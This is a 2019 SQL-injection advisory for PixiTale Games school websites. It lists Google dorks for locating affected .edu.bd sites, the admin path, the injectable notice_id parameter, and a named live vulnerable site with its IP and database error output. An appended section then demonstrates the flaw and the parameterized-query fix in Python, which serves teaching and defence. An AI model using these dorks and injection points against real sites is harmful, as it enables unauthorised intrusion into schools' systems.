############################################################
# Exploit Title : By Prodigy PixiTale Games Bangladesh Education SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 08/01/2019
# Vendor Homepage : pixitale.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:''Designed by PIXITALE GAMES.'' site:edu.bd
intext:''By Prodigy. Copyright © PIXITALE GAMES''
intext:''Copyright © 2017 PIXITALE GAMES. Designed by PIXITALE GAMES. All rights reserved.''
# Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
CXSecurity Exploit Reference Link : cxsecurity.com/issue/WLB-2019010053
############################################################
# Admin Panel Login Path :
**************************
/admin/
# SQL Injection Exploit :
**************************
/notice.php?notice_id=[SQL Injection]
############################################################
# Example Vulnerable Site =>
**************************
Note => (192.185.171.2) => There are 46 domains hosted on this server.
[+] sjs.edu.bd/notice.php?notice_id=439%27
=> [ Proof of Concept ] => archive.fo/ePLlF
############################################################
# SQL Database Error :
********************
Last query: SELECT * FROM notice WHERE id='439''
Mysql error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''439''' at line 1
############################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
############################################################
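The error message above shows the root cause: the notice_id parameter is spliced straight into the SQL text, so a stray quote becomes part of the statement. As an added illustration (not code from the advisory or from the vendor), the same query shape is reproduced against an in-memory SQLite table beside the parameterized form a fix would use; the table schema and rows are constructed here, and SQLite is a stand-in for MySQL (both treat a doubled quote inside a string literal as an escaped quote, which is why the trailing quote leaves the literal unterminated).

```python
import sqlite3


def make_db():
    # Constructed stand-in for the application's notice table; schema and rows are assumptions.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE notice (id TEXT PRIMARY KEY, title TEXT)")
    conn.executemany(
        "INSERT INTO notice VALUES (?, ?)",
        [("438", "Exam schedule"), ("439", "Holiday notice")],
    )
    return conn


def fetch_notice_unsafe(conn, notice_id):
    # Mirrors the query in the error message: the request parameter is concatenated
    # into the statement, so quote characters in it are parsed as SQL syntax.
    sql = "SELECT * FROM notice WHERE id='" + notice_id + "'"
    return conn.execute(sql).fetchall()


def fetch_notice_safe(conn, notice_id):
    # Hardened form: the value is bound to a placeholder and sent separately from the
    # SQL text, so a quote in it is just data and can only fail to match a row.
    return conn.execute("SELECT * FROM notice WHERE id=?", (notice_id,)).fetchall()


def probe(fetch, notice_id):
    """Run one fetch function on a fresh database.

    Returns ("ok", rows) or ("error", message) so the two versions can be compared.
    """
    conn = make_db()
    try:
        return ("ok", fetch(conn, notice_id))
    except sqlite3.Error as exc:
        return ("error", str(exc))
    finally:
        conn.close()


if __name__ == "__main__":
    # "439'" is the URL-decoded form of the notice_id=439%27 request shown in the advisory.
    for value in ("439", "439'"):
        print(repr(value), "unsafe:", probe(fetch_notice_unsafe, value))
        print(repr(value), "safe:  ", probe(fetch_notice_safe, value))
```

The unsafe version returns a database syntax error for the quoted input, which is the same symptom the advisory reports; the safe version simply returns no rows. Since notice_id is evidently numeric, a fix should also reject any value that is not a plain integer before it reaches the query.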